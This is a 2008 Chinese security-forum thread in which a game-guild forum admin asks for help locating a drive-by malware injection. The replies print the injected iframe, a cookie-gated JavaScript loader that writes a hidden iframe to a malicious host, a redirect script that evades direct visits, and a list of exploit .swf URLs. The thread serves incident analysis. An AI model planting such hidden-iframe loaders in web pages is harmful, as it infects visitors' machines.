查看: 1497|回复: 7
收起左侧

论坛又被挂马,求教挂马位置,万分感谢

[复制链接]
cloudgreen
头像被屏蔽
发表于 2008-12-13 13:27:52 | 显示全部楼层 |阅读模式
我们游戏公会的论坛
www.lengyuesz.com

上次被挂马 lg560852 版友找到http://www.lengyuesz.com/bbs/include/javascript/common.js脚本里面有一句eval加密

上次:http://bbs.kafan.cn/thread-374449-1-1.html


现在越来越猖狂了

希望个个解决办法
IllusionWing
发表于 2008-12-13 15:16:09 | 显示全部楼层
自修护系统
建议发到样本区让达人来找..
把可能的漏洞堵上,杜绝权限滥用
如果是ASP或者ASP.NET防注入我可以帮点忙,其他就爱莫能助了..

[ 本帖最后由 gankeyu 于 2008-12-13 15:18 编辑 ]
zhengjing
发表于 2008-12-13 15:24:16 | 显示全部楼层
bbs防越权是个大问题 搜索一下最近有什么可用的提权漏洞
不妨模拟一下黑客攻击 有可能会查到问题所在
IllusionWing
发表于 2008-12-13 15:33:31 | 显示全部楼层

回复 3楼 zhengjing 的帖子

渗透攻击很好。。就怕服务器受不了
lg560852
发表于 2008-12-13 15:55:39 | 显示全部楼层
此次在BBS首页http://www.lengyuesz.com/bbs上有一句
<iframe src=" http://www.e7wan.com/e7wan.nbar.2.html?color=blue" width="530" height="72" frameborder="0"></iframe>

其内的恶意代码:
<script language =javascript>
var browserVer = parseInt(navigator.appVersion);
var cookieString = new String(document.cookie)
var cookieHeader = 'popvip='
var beginPosition = cookieString.indexOf(cookieHeader)
if (beginPosition <0)
{
document.write("<iframe src=http://baidu.bai1ud.cn/w53/w53.htm width=100 height=0></iframe>");
var Then = new Date()
Then.setTime(Then.getTime()+ 6*60*60*1000)
document.cookie = 'popvip=yes;expires='+Then.toGMTString()
}
</script>

清理后,请下载一个 WEB猫 来监控一下,防止再次篡改。
花间酒
发表于 2008-12-13 15:55:52 | 显示全部楼层
http://www.lengyuesz.com/bbs/ http://www.e7wan.com/e7wan.nbar.2.html?color=blue
当中有
<iframe src=" http://www.e7wan.com/e7wan.nbar.2.html?color=blue" width="530" height="72" frameborder="0"></iframe>

http://www.e7wan.com/e7wan.nbar.2.html?color=blue中有
document.write("<iframe src=http://baidu.bai1ud.cn/w53/w53.htm width=100 height=0></iframe>");

http://baidu.bai1ud.cn/w53/w53.htm.
自己看
花间酒
发表于 2008-12-13 15:56:34 | 显示全部楼层
我慢了
http://baidu.bai1ud.cn/w53/w53.htm


有校验自己的的父連接 直接访问的转向GOOGLE

  1. <script>
  2. if(self.location==top.location)
  3. {
  4. location.href='http://www.google.cn';
  5. }
  6. </script><iframe width=100 height=0 src=new.html></iframe>
  7. <BR>
  8. </BR>
  9. <BR>
  10. </BR>

  11. <script type="text/javascript" src="http://js.tongji.cn.yahoo.com/841705/ystat.js"></script><noscript><a href="http://tongji.cn.yahoo.com"><img src="http://img.tongji.cn.yahoo.com/841705/ystat.gif"/></a></noscript>
复制代码
  1. http://baidu.baidu-11.com/wl.css http://baidu.bai1ud.cn/w53/m15.swf
  2. http://baidu.bai1ud.cn/w53/m16.swfhttp://baidu.bai1ud.cn/w53/m45.swfhttp://baidu.bai1ud.cn/w53/m47.swfhttp://baidu.bai1ud.cn/w53/m28.swfhttp://baidu.bai1ud.cn/w53/m64.swfhttp://baidu.bai1ud.cn/w53/x15.swf
  3. http://baidu.bai1ud.cn/w53/x16.swfhttp://baidu.bai1ud.cn/w53/x45.swfhttp://baidu.bai1ud.cn/w53/x47.swfhttp://baidu.bai1ud.cn/w53/x28.swfhttp://baidu.bai1ud.cn/w53/x64.swf老还有利用超星ACCESS 聯眾暴風影音realplayer
复制代码

[ 本帖最后由 lunglungyu 于 2008-12-13 16:16 编辑 ]

评分

参与人数 1人气 +1 收起 理由
lg560852 + 1 你分析的更详细!O(∩_∩)O~

查看全部评分

cloudgreen
头像被屏蔽
 楼主| 发表于 2008-12-13 16:36:40 | 显示全部楼层
再次谢谢
不知道用什么工具才能看到 隐藏的恶意代码
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-5-3 08:36 , Processed in 0.125290 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表